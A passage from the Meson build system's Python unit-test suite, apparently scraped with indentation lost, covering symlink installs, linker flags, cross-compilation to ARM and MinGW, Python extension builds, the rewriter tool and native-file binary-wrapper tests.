# the creation of zipapps. Create it dynamically and run the test by
# hand.
src = '../../nonexistent.txt'
os.symlink(src, 'invalid-symlink.txt')
try:
self.init(testdir)
self.build()
self.install()
install_path = subdir_path.split(os.path.sep)[-1]
link = os.path.join(self.installdir, 'usr', 'share', install_path, 'invalid-symlink.txt')
self.assertTrue(os.path.islink(link), msg=link)
self.assertEqual(src, os.readlink(link))
self.assertFalse(os.path.isfile(link), msg=link)
finally:
os.remove(os.path.join(subdir, 'invalid-symlink.txt'))
def test_install_subdir_symlinks(self):
self.install_subdir_invalid_symlinks('62 install subdir', os.path.join('sub', 'sub1'))
def test_install_subdir_symlinks_with_default_umask(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub2')
def test_install_subdir_symlinks_with_default_umask_and_mode(self):
self.install_subdir_invalid_symlinks('195 install_mode', 'sub1')
@skipIfNoPkgconfigDep('gmodule-2.0')
def test_ldflag_dedup(self):
testdir = os.path.join(self.unit_test_dir, '52 ldflagdedup')
if is_cygwin() or is_osx():
raise unittest.SkipTest('Not applicable on Cygwin or OSX.')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
max_count = 0
search_term = '-Wl,--export-dynamic'
with open(build_ninja, 'r', encoding='utf-8') as f:
for line in f:
max_count = max(max_count, line.count(search_term))
self.assertEqual(max_count, 1, 'Export dynamic incorrectly deduplicated.')
def test_compiler_libs_static_dedup(self):
testdir = os.path.join(self.unit_test_dir, '56 dedup compiler libs')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
lines = f.readlines()
for lib in ('-ldl', '-lm', '-lc', '-lrt'):
for line in lines:
if lib not in line:
continue
# Assert that
self.assertEqual(len(line.split(lib)), 2, msg=(lib, line))
@skipIfNoPkgconfig
def test_noncross_options(self):
# C_std defined in project options must be in effect also when native compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir, extra_args=['-Dpkg_config_path=' + testdir])
compdb = self.get_compdb()
self.assertEqual(len(compdb), 2)
self.assertRegex(compdb[0]['command'], '-std=c99')
self.assertRegex(compdb[1]['command'], '-std=c99')
self.build()
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '61 identity cross')
crossfile = tempfile.NamedTemporaryFile(mode='w')
env = {'CC': '"' + os.path.join(testdir, 'build_wrapper.py') + '"'}
crossfile.write('''[binaries]
c = ['{0}']
'''.format(os.path.join(testdir, 'host_wrapper.py')))
crossfile.flush()
self.meson_cross_file = crossfile.name
# TODO should someday be explicit about build platform only here
self.init(testdir, override_envvars=env)
@skipIfNoPkgconfig
def test_static_link(self):
if is_cygwin():
raise unittest.SkipTest("Cygwin doesn't support LD_LIBRARY_PATH.")
# Build some libraries and install them
testdir = os.path.join(self.unit_test_dir, '68 static link/lib')
libdir = os.path.join(self.installdir, self.libdir)
oldprefix = self.prefix
self.prefix = self.installdir
self.init(testdir)
self.install(use_destdir=False)
# Test that installed libraries works
self.new_builddir()
self.prefix = oldprefix
meson_args = ['-Dc_link_args=-L{}'.format(libdir),
'--fatal-meson-warnings']
testdir = os.path.join(self.unit_test_dir, '68 static link')
env = {'PKG_CONFIG_LIBDIR': os.path.join(libdir, 'pkgconfig')}
self.init(testdir, extra_args=meson_args, override_envvars=env)
self.build()
self.run_tests()
def _check_ld(self, check: str, name: str, lang: str, expected: str) -> None:
if is_sunos():
raise unittest.SkipTest('Solaris currently cannot override the linker.')
if not shutil.which(check):
raise unittest.SkipTest('Could not find {}.'.format(check))
envvar = mesonbuild.envconfig.BinaryTable.evarMap['{}_ld'.format(lang)]
with mock.patch.dict(os.environ, {envvar: name}):
env = get_fake_env()
comp = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
if lang != 'rust' and comp.use_linker_args('foo') == []:
raise unittest.SkipTest(
'Compiler {} does not support using alternative linkers'.format(comp.id))
self.assertEqual(comp.linker.id, expected)
def test_ld_environment_variable_bfd(self):
self._check_ld('ld.bfd', 'bfd', 'c', 'ld.bfd')
def test_ld_environment_variable_gold(self):
self._check_ld('ld.gold', 'gold', 'c', 'ld.gold')
def test_ld_environment_variable_lld(self):
self._check_ld('ld.lld', 'lld', 'c', 'ld.lld')
@skipIfNoExecutable('rustc')
def test_ld_environment_variable_rust(self):
self._check_ld('ld.gold', 'gold', 'rust', 'ld.gold')
def test_ld_environment_variable_cpp(self):
self._check_ld('ld.gold', 'gold', 'cpp', 'ld.gold')
def test_ld_environment_variable_objc(self):
self._check_ld('ld.gold', 'gold', 'objc', 'ld.gold')
def test_ld_environment_variable_objcpp(self):
self._check_ld('ld.gold', 'gold', 'objcpp', 'ld.gold')
@skipIfNoExecutable('gfortran')
def test_ld_environment_variable_fortran(self):
self._check_ld('ld.gold', 'gold', 'fortran', 'ld.gold')
def compute_sha256(self, filename):
with open(filename, 'rb') as f:
return hashlib.sha256(f.read()).hexdigest()
def test_wrap_with_file_url(self):
testdir = os.path.join(self.unit_test_dir, '73 wrap file url')
source_filename = os.path.join(testdir, 'subprojects', 'foo.tar.xz')
patch_filename = os.path.join(testdir, 'subprojects', 'foo-patch.tar.xz')
wrap_filename = os.path.join(testdir, 'subprojects', 'foo.wrap')
source_hash = self.compute_sha256(source_filename)
patch_hash = self.compute_sha256(patch_filename)
wrap = textwrap.dedent("""\
[wrap-file]
directory = foo
source_url = file://{}
source_filename = foo.tar.xz
source_hash = {}
patch_url = file://{}
patch_filename = foo-patch.tar.xz
patch_hash = {}
""".format(source_filename, source_hash, patch_filename, patch_hash))
with open(wrap_filename, 'w') as f:
f.write(wrap)
self.init(testdir)
self.build()
self.run_tests()
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'packagecache'))
windows_proof_rmtree(os.path.join(testdir, 'subprojects', 'foo'))
os.unlink(wrap_filename)
def should_run_cross_arm_tests():
return shutil.which('arm-linux-gnueabihf-gcc') and not platform.machine().lower().startswith('arm')
@unittest.skipUnless(not is_windows() and should_run_cross_arm_tests(), "requires ability to cross compile to ARM")
class LinuxCrossArmTests(BasePlatformTests):
'''
Tests that cross-compilation to Linux/ARM works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'ubuntu-armhf.txt')
def test_cflags_cross_environment_pollution(self):
'''
Test that the CFLAGS environment variable does not pollute the cross
environment. This can't be an ordinary test case because we need to
inspect the compiler database.
'''
testdir = os.path.join(self.common_test_dir, '3 static')
self.init(testdir, override_envvars={'CFLAGS': '-DBUILD_ENVIRONMENT_ONLY'})
compdb = self.get_compdb()
self.assertNotIn('-DBUILD_ENVIRONMENT_ONLY', compdb[0]['command'])
def test_cross_file_overrides_always_args(self):
'''
Test that $lang_args in cross files always override get_always_args().
Needed for overriding the default -D_FILE_OFFSET_BITS=64 on some
architectures such as some Android versions and Raspbian.
https://github.com/mesonbuild/meson/issues/3049
https://github.com/mesonbuild/meson/issues/3089
'''
testdir = os.path.join(self.unit_test_dir, '33 cross file overrides always args')
self.meson_cross_file = os.path.join(testdir, 'ubuntu-armhf-overrides.txt')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-D_FILE_OFFSET_BITS=64.*-U_FILE_OFFSET_BITS')
self.build()
def test_cross_libdir(self):
# When cross compiling "libdir" should default to "lib"
# rather than "lib/x86_64-linux-gnu" or something like that.
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
for i in self.introspect('--buildoptions'):
if i['name'] == 'libdir':
self.assertEqual(i['value'], 'lib')
return
self.assertTrue(False, 'Option libdir not in introspect data.')
def test_std_remains(self):
# C_std defined in project options must be in effect also when cross compiling.
testdir = os.path.join(self.unit_test_dir, '51 noncross options')
self.init(testdir)
compdb = self.get_compdb()
self.assertRegex(compdb[0]['command'], '-std=c99')
self.build()
@skipIfNoPkgconfig
def test_pkg_config_option(self):
if not shutil.which('arm-linux-gnueabihf-pkg-config'):
raise unittest.SkipTest('Cross-pkgconfig not found.')
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
def should_run_cross_mingw_tests():
return shutil.which('x86_64-w64-mingw32-gcc') and not (is_windows() or is_cygwin())
@unittest.skipUnless(not is_windows() and should_run_cross_mingw_tests(), "requires ability to cross compile with MinGW")
class LinuxCrossMingwTests(BasePlatformTests):
'''
Tests that cross-compilation to Windows/MinGW works
'''
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
self.meson_cross_file = os.path.join(src_root, 'cross', 'linux-mingw-w64-64bit.txt')
def test_exe_wrapper_behaviour(self):
'''
Test that an exe wrapper that isn't found doesn't cause compiler sanity
checks and compiler checks to fail, but causes configure to fail if it
requires running a cross-built executable (custom_target or run_target)
and causes the tests to be skipped if they are run.
'''
testdir = os.path.join(self.unit_test_dir, '36 exe_wrapper behaviour')
# Configures, builds, and tests fine by default
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
os.mkdir(self.builddir)
# Change cross file to use a non-existing exe_wrapper and it should fail
self.meson_cross_file = os.path.join(testdir, 'broken-cross.txt')
# Force tracebacks so we can detect them properly
env = {'MESON_FORCE_BACKTRACE': '1'}
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*target.*use-exe-wrapper'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Drun-target=false',
inprocess=True,
override_envvars=env)
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*run target.*run-prog'):
# Must run in-process or we'll get a generic CalledProcessError
self.init(testdir, extra_args='-Dcustom-target=false',
inprocess=True,
override_envvars=env)
self.init(testdir, extra_args=['-Dcustom-target=false', '-Drun-target=false'],
override_envvars=env)
self.build()
with self.assertRaisesRegex(MesonException, 'exe_wrapper.*PATH'):
# Must run in-process or we'll get a generic CalledProcessError
self.run_tests(inprocess=True, override_envvars=env)
@skipIfNoPkgconfig
def test_cross_pkg_config_option(self):
testdir = os.path.join(self.unit_test_dir, '58 pkg_config_path option')
self.init(testdir, extra_args=[
'-Dbuild.pkg_config_path=' + os.path.join(testdir, 'build_extra_path'),
'-Dpkg_config_path=' + os.path.join(testdir, 'host_extra_path'),
])
class PythonTests(BasePlatformTests):
'''
Tests that verify compilation of python extension modules
'''
def test_versions(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Skipping python tests with {} backend'.format(self.backend.name))
testdir = os.path.join(self.src_root, 'test cases', 'unit', '39 python extmodule')
# No python version specified, this will use meson's python
self.init(testdir)
self.build()
self.run_tests()
self.wipe()
# When specifying a known name, (python2 / python3) the module
# will also try 'python' as a fallback and use it if the major
# version matches
try:
self.init(testdir, extra_args=['-Dpython=python2'])
self.build()
self.run_tests()
except unittest.SkipTest:
# python2 is not necessarily installed on the test machine,
# if it is not, or the python headers can't be found, the test
# will raise MESON_SKIP_TEST, we could check beforehand what version
# of python is available, but it's a bit of a chicken and egg situation,
# as that is the job of the module, so we just ask for forgiveness rather
# than permission.
pass
self.wipe()
for py in ('pypy', 'pypy3'):
try:
self.init(testdir, extra_args=['-Dpython=%s' % py])
except unittest.SkipTest:
# Same as above, pypy2 and pypy3 are not expected to be present
# on the test system, the test project only raises in these cases
continue
# We have a pypy, this is expected to work
self.build()
self.run_tests()
self.wipe()
# The test is configured to error out with MESON_SKIP_TEST
# in case it could not find python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=not-python'])
self.wipe()
# While dir is an external command on both Windows and Linux,
# it certainly isn't python
with self.assertRaises(unittest.SkipTest):
self.init(testdir, extra_args=['-Dpython=dir'])
self.wipe()
class RewriterTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.maxDiff = None
def prime(self, dirname):
copy_tree(os.path.join(self.rewrite_test_dir, dirname), self.builddir)
def rewrite_raw(self, directory, args):
if isinstance(args, str):
args = [args]
command = self.rewrite_command + ['--verbose', '--skip', '--sourcedir', directory] + args
p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
universal_newlines=True, timeout=60)
print('STDOUT:')
print(p.stdout)
print('STDERR:')
print(p.stderr)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
if not p.stderr:
return {}
return json.loads(p.stderr)
def rewrite(self, directory, args):
if isinstance(args, str):
args = [args]
return self.rewrite_raw(directory, ['command'] + args)
def test_target_source_list(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_add_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['a5.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['a5.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['a3.cpp', 'main.cpp', 'a7.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp', 'a4.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_add_sources_abs(self):
self.prime('1 basic')
abs_src = [os.path.join(self.builddir, x) for x in ['a1.cpp', 'a2.cpp', 'a6.cpp']]
add = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "src_add", "sources": abs_src}])
inf = json.dumps([{"type": "target", "target": "trivialprog1", "operation": "info"}])
self.rewrite(self.builddir, add)
out = self.rewrite(self.builddir, inf)
expected = {'target': {'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['a1.cpp', 'a2.cpp', 'a6.cpp', 'fileA.cpp', 'main.cpp']}}}
self.assertDictEqual(out, expected)
def test_target_remove_sources(self):
self.prime('1 basic')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'rmSrc.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileC.cpp', 'main.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp']},
}
}
self.assertDictEqual(out, expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, expected)
def test_target_subdir(self):
self.prime('2 subdirs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c', 'third.c']}
self.assertDictEqual(list(out['target'].values())[0], expected)
# Check the written file
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(list(out['target'].values())[0], expected)
def test_target_remove(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_tatrget_add(self):
self.prime('1 basic')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'target': {
'trivialprog0@exe': {'name': 'trivialprog0', 'sources': ['main.cpp', 'fileA.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog1@exe': {'name': 'trivialprog1', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog2@exe': {'name': 'trivialprog2', 'sources': ['fileB.cpp', 'fileC.cpp']},
'trivialprog3@exe': {'name': 'trivialprog3', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog4@exe': {'name': 'trivialprog4', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog5@exe': {'name': 'trivialprog5', 'sources': ['main.cpp', 'fileB.cpp', 'fileC.cpp']},
'trivialprog6@exe': {'name': 'trivialprog6', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog7@exe': {'name': 'trivialprog7', 'sources': ['fileB.cpp', 'fileC.cpp', 'main.cpp', 'fileA.cpp']},
'trivialprog8@exe': {'name': 'trivialprog8', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog9@exe': {'name': 'trivialprog9', 'sources': ['main.cpp', 'fileA.cpp']},
'trivialprog10@sha': {'name': 'trivialprog10', 'sources': ['new1.cpp', 'new2.cpp']},
}
}
self.assertDictEqual(out, expected)
def test_target_remove_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'rmTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
self.assertDictEqual(out, {})
def test_target_add_subdir(self):
self.prime('2 subdirs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'addTgt.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'something', 'sources': ['first.c', 'second.c']}
self.assertDictEqual(out['target']['94b671c@@something@exe'], expected)
def test_target_source_sorting(self):
self.prime('5 sorting')
add_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'src_add', 'sources': ['a666.c']}])
inf_json = json.dumps([{'type': 'target', 'target': 'exe1', 'operation': 'info'}])
out = self.rewrite(self.builddir, add_json)
out = self.rewrite(self.builddir, inf_json)
expected = {
'target': {
'exe1@exe': {
'name': 'exe1',
'sources': [
'aaa/a/a1.c',
'aaa/b/b1.c',
'aaa/b/b2.c',
'aaa/f1.c',
'aaa/f2.c',
'aaa/f3.c',
'bbb/a/b1.c',
'bbb/b/b2.c',
'bbb/c1/b5.c',
'bbb/c2/b7.c',
'bbb/c10/b6.c',
'bbb/a4.c',
'bbb/b3.c',
'bbb/b4.c',
'bbb/b5.c',
'a1.c',
'a2.c',
'a3.c',
'a10.c',
'a20.c',
'a30.c',
'a100.c',
'a101.c',
'a110.c',
'a210.c',
'a666.c',
'b1.c',
'c2.c'
]
}
}
}
self.assertDictEqual(out, expected)
def test_target_same_name_skip(self):
self.prime('4 same name targets')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'addSrc.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {'name': 'myExe', 'sources': ['main.cpp']}
self.assertEqual(len(out['target']), 2)
for val in out['target'].values():
self.assertDictEqual(expected, val)
def test_kwargs_info(self):
self.prime('3 kwargs')
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.2', 'meson_version': '0.50.0', 'license': ['GPL', 'MIT']},
'target#tgt1': {'build_by_default': False, 'build_rpath': '/usr/local', 'dependencies': 'dep1'},
'dependency#dep1': {'required': True, 'method': 'cmake'}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_add(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'add.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': ['GPL', 'MIT', 'BSD']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'license': 'GPL'},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_remove_regex(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'remove_regex.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_kwargs_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {},
'target#tgt1': {},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_set(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_set.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['buildtype=release', 'debug=True', 'cpp_std=c++11']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
def test_default_options_delete(self):
self.prime('3 kwargs')
self.rewrite(self.builddir, os.path.join(self.builddir, 'defopts_delete.json'))
out = self.rewrite(self.builddir, os.path.join(self.builddir, 'info.json'))
expected = {
'kwargs': {
'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
self.current_config = 0
self.current_wrapper = 0
def helper_create_native_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
f.write("{}='{}'\n".format(k, v))
return filename
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
"""Creates a wrapper around a binary that overrides specific values."""
filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper))
extra_args = extra_args or {}
self.current_wrapper += 1
if is_haiku():
chbang = '#!/bin/env python3'
else:
chbang = '#!/usr/bin/env python3'
with open(filename, 'wt') as f:
f.write(textwrap.dedent('''\
{}
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
'''.format(chbang)))
for name in chain(extra_args, kwargs):
f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
f.write(' args, extra_args = parser.parse_known_args()\n')
for name, value in chain(extra_args.items(), kwargs.items()):
f.write(' if args.{}:\n'.format(name))
f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
f.write(' sys.exit(0)\n')
f.write(textwrap.dedent('''
ret = subprocess.run(
["{}"] + extra_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(ret.stdout.decode('utf-8'))
print(ret.stderr.decode('utf-8'), file=sys.stderr)
sys.exit(ret.returncode)
if __name__ == '__main__':
main()
'''.format(binary)))
if not is_windows():
os.chmod(filename, 0o755)
return filename
# On windows we need yet another level of indirection, as cmd cannot
# invoke python files itself, so instead we generate a .bat file, which
# invokes our python wrapper
batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper))
with open(batfile, 'wt') as f:
f.write(r'@{} {} %*'.format(sys.executable, filename))
return batfile
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
"""Helper for generating tests for overriding compilers for langaugages
with more than one implementation, such as C, C++, ObjC, ObjC++, and D.
"""
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, for_machine)
cc = getter()
binary, newid = cb(cc)
env.binaries[for_machine].binaries[lang] = binary
compiler = getter()
self.assertEqual(compiler.id, newid)
def test_multiple_native_files_override(self):
wrapper = self.helper_create_binary_wrapper('bash', version='foo')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
# This test hangs on cygwin.
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
def test_native_file_is_pipe(self):
fifo = os.path.join(self.builddir, 'native.file')
os.mkfifo(fifo)
with tempfile.TemporaryDirectory() as d:
wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')
def filler():
with open(fifo, 'w') as f:
f.write('[binaries]\n')
f.write("bash = '{}'\n".format(wrapper))
thread = threading.Thread(target=filler)
thread.start()
self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
thread.join()
os.unlink(fifo)
self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('python')
config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
def _simple_test(self, case, binary, entry=None):
wrapper = self.helper_create_binary_wrapper(binary, version='12345')
config = self.helper_create_native_file({'binaries': {entry or binary: wrapper}})
self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)])
def test_find_program(self):
self._simple_test('find_program', 'bash')
def test_config_tool_dep(self):
# Do the skip at this level to avoid screwing up the cache
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
if not shutil.which('llvm-config'):
raise unittest.SkipTest('No llvm-installed, cannot test')
self._simple_test('config_dep', 'llvm-config')
def test_python3_module(self):
self._simple_test('python3', 'python3')
def test_python_module(self):
if is_windows():
# Bat adds extra crap to stdout, so the version check logic in the
